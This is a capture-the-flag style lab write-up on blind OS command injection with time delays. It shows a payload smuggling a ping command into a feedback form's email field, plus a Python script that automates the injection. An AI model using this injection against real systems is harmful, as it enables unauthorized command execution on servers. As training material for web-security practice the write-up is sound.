2. Blind OS command injection with time delays

Lets open the vulnerable lab:

Move around a little bit:

Within burpsuite, we have a post request to the target with those parameters:

Lets test them out:

We tried to ping the localhost in the email paramter, and it take the same amount of time that pings take to finish pinging.

||ping+-c+5+127.0.0.1||

We need to ping 10 seconds:

And we solved the lab:

Solve it using a python3 script:

import requests  
import os  
import sys  
import re  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
session = requests.session()  
  
  
def CommandInjection():  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "feedback").text)  
    print("[*] Perform Command Injection.")  
    headers = {"Content-Type": "application/x-www-form-urlencoded"}  
    data = f"csrf={csrf[0]}&name=test&email=test@test.com||ping+-c+10+127.0.0.1||&subject=test&message=test"  
    session.post(url=url + "feedback/submit", headers=headers, data=data)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    CommandInjection()  
    print("[+] Solved.")

Previous1. OS command injection, simple case Next3. Blind OS command injection with output redirection

Last updated 1 month ago